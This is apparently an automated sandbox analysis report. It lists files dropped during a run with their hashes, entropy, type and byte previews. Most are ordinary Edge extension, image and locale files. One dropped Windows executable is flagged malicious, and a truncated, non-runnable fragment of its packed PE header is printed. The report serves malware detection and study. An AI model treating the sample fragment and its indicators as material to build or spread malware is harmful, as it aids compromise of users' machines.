                                                                                                                                                                                                                                                        Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41900
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):76321
                                                                                                                                                                                                                                                        Entropy (8bit):7.996057445951542
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iys3BBrYunau6wpGzxue:GdS8scZNzFrMa4M+lK5/nXexue
                                                                                                                                                                                                                                                        MD5:D7A1AC56ED4F4D17DD0524C88892C56D
                                                                                                                                                                                                                                                        SHA1:4153CA1A9A4FD0F781ECD5BA9D2A1E68C760ECD4
                                                                                                                                                                                                                                                        SHA-256:0A29576C4002D863B0C5AE7A0B36C0BBEB0FB9AFD16B008451D4142C07E1FF2B
                                                                                                                                                                                                                                                        SHA-512:31503F2F6831070E887EA104296E17EE755BB6BBFB1EF2A15371534BFA2D3F0CD53862389625CF498754B071885A53E1A7F82A3546275DB1F4588E0E80BF7BEE
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.
                                                                                                                                                                                                                                                        Process:C:\Users\user\DocumentsCAFHDBGHJK.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1916416
                                                                                                                                                                                                                                                        Entropy (8bit):7.951304925887271
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:49152:WOaQDq1v/ossxzde9Uf9zwOendehMA6NyUlDv:WvQDsdsxxl05ndNy8D
                                                                                                                                                                                                                                                        MD5:FBE6E564AF67243480309BCB73FD7856
                                                                                                                                                                                                                                                        SHA1:5E74F927EBD1E7811A271ACEC5AEDD2E8BE75353
                                                                                                                                                                                                                                                        SHA-256:DEC01788D36A2CE2175CB87588E7FA92F8052E86BF9CAC3B51AE3A04213E8FBD
                                                                                                                                                                                                                                                        SHA-512:B2AF792E1BFC2239FFB57824AEE782727A9D3886DCE7F3F15A797D031A6E26F8667D9F20C6FBF21D820FC9B50B6FEEB106E9AE1CA88DAB745D93356E9F0EF5BA
                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f............................. L...........@..........................PL...........@.................................W...k.......H...................0.L...............................L..................................................... . ............................@....rsrc...H...........................@....idata ............................@... .@+.........................@...yasgrbfq. ....1.. ..................@...lwauugho......L.....................@....taggant.0... L.."..................@...................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2110
                                                                                                                                                                                                                                                        Entropy (8bit):5.402930072087358
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854Rrg:8e2Fa116uCntc5toYC2u
                                                                                                                                                                                                                                                        MD5:DFD83C83D16B98E3C9C6652BCEE381DE
                                                                                                                                                                                                                                                        SHA1:C95D816896DEA8D92A3FC9C67ECC590CE67E54AA
                                                                                                                                                                                                                                                        SHA-256:DCCAC3E9A17039623FA641B70610F0C923082D045BE078E3DBCD2A79733D5A41
                                                                                                                                                                                                                                                        SHA-512:AC83F02E460337135933E8204B410B926A1C11712EC5129CD8F8EC55DEE2A040FA2E81D84C6C3854266981E58FB7001080E9B5B4FF29BFD998A696DA4DC77FD0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):206855
                                                                                                                                                                                                                                                        Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                                                        MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                                                        SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                                                        SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                                                        SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):11185
                                                                                                                                                                                                                                                        Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                        MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                        SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                        SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                        SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1538383
                                                                                                                                                                                                                                                        Entropy (8bit):7.992188074165653
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:24576:6Lo4xpfD5VQvfIQ3+FOpDm9DIJhjhsFOU2gHoKLOHMZ8RF+qZgBFvsCf5kDAfpR4:5cfD5VifJOopDm1IjjhsF5bFLOHMqv+M
                                                                                                                                                                                                                                                        MD5:6499D02BDD5AB84466A1447C3EB36342
                                                                                                                                                                                                                                                        SHA1:48377310CEE47C7A45707F65EC43B7EA67436A0C
                                                                                                                                                                                                                                                        SHA-256:A590D959CDB0E31A18A222D3F949A77308D7BB1B485DDAE94657318389D1AC16
                                                                                                                                                                                                                                                        SHA-512:7A61A73EE09E245B196A3AA9B3D8D5AA88791005D2196539EA74061BD5DBFBA022DFF7299632645CF299541156EB399ACCE1C3DDCD3259497990B60EAF55E0B0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...qiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:695f8e9f-409d-324a-b50a-1e3067707628" xmpMM:DocumentID="xmp.did:91EA24D7191011E5B1FF9488C51C29D1" xmpMM:InstanceID="xmp.iid:91EA24D6191011E5B1FF9488C51C29D1" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6a6b844a-8117-4c4c-9b2f-30d3769ed7c7" stRef:documentID="xmp.did:695f8e9f-409d-324a-b50a-1e3067707628"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>^.i.....IDATx.bb .0..;./..;@...A.P9F...y
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):138356
                                                                                                                                                                                                                                                        Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                        MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                        SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                        SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                        SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):4982
                                                                                                                                                                                                                                                        Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                        MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                        SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                        SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                        SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):908
                                                                                                                                                                                                                                                        Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                        MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                        SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                        SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                        SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1285
                                                                                                                                                                                                                                                        Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                        MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                        SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                        SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                        SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1244
                                                                                                                                                                                                                                                        Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                        MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                        SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                        SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                        SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):977
                                                                                                                                                                                                                                                        Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                        MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                        SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                        SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                        SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):3107
                                                                                                                                                                                                                                                        Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
